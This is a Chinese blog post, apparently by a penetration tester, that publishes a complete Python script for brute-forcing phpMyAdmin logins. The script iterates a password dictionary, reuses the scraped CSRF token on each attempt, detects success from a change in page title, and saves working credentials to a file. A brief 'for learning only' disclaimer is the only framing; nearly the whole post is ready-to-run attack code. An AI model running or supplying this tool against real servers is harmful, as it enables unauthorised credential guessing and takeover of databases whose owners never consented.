前言
本脚本仅作学习交流使用,请勿用于非法用途
最近在做渗透测试,有一台内网的PhpMyAdmin的机器,想着爆破一下,网上找的脚本或多或少都有点问题,就自己造了一个。
脚本
只支持Python3.4及以上版本
修改 target, user, passdic 三个参数,然后直接运行即可,如果爆破成功会把结果写到success.txt文件里
#!/usr/bin/python3
'''
# @Author : Chr_
# @Date : 2020-12-06 12:39:57
# @LastEditors : Chr_
# @LastEditTime : 2020-12-08 13:16:20
# @Description : PhpMyAdmin爆破脚本
'''
#
from requests import session
from re import findall
from html import unescape
#
# PMA地址,例如 http://localhost/index.php
target = 'http://localhost/index.php'
# 要爆破的用户名
user = 'root'
# 密码字典文件路径
passdic = 'password.txt'
#
ss = session()
ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
def get_token(text) -> str:
'''获取token'''
token = findall("name=\"token\" value=\"(.*?)\" />", text)
return unescape(token[0]) if token else None
def get_title(text) -> str:
'''获取标题'''
title = findall('<title>(.*)</title>', text)
return title[0] if title else None
def try_login(user, pwd, token):
'''尝试登陆'''
data = {'pma_username': user,
'pma_password': pwd,
'server': 1,
'target': 'index.php',
'token': token}
r = ss.post(url=target, data=data)
return r.text
def fuck_pma():
'''爆破'''
with open(passdic, 'r', encoding='utf-8') as f:
html = try_login('', '', '')
title_fail = get_title(html)
token = get_token(html)
for line in f:
pwd = line.strip()
print(f'[?] 尝试登陆 {user} {pwd} ')
html = try_login(user, pwd, token)
title = get_title(html)
token = get_token(html)
if title != title_fail:
print(f'[√] 登陆成功 {title}')
with open('success.txt', 'a', encoding='utf-8') as f:
f.write(f'{target} | {user} | {pwd}\n')
break
else:
print(f'[×] 登陆失败 {title}')
if __name__ == "__main__":
try:
fuck_pma()
except Exception as e:
print(e)本文链接:https://blog.chrxw.com/archives/2020/12/08/1429.html
转载请保留本文链接,谢谢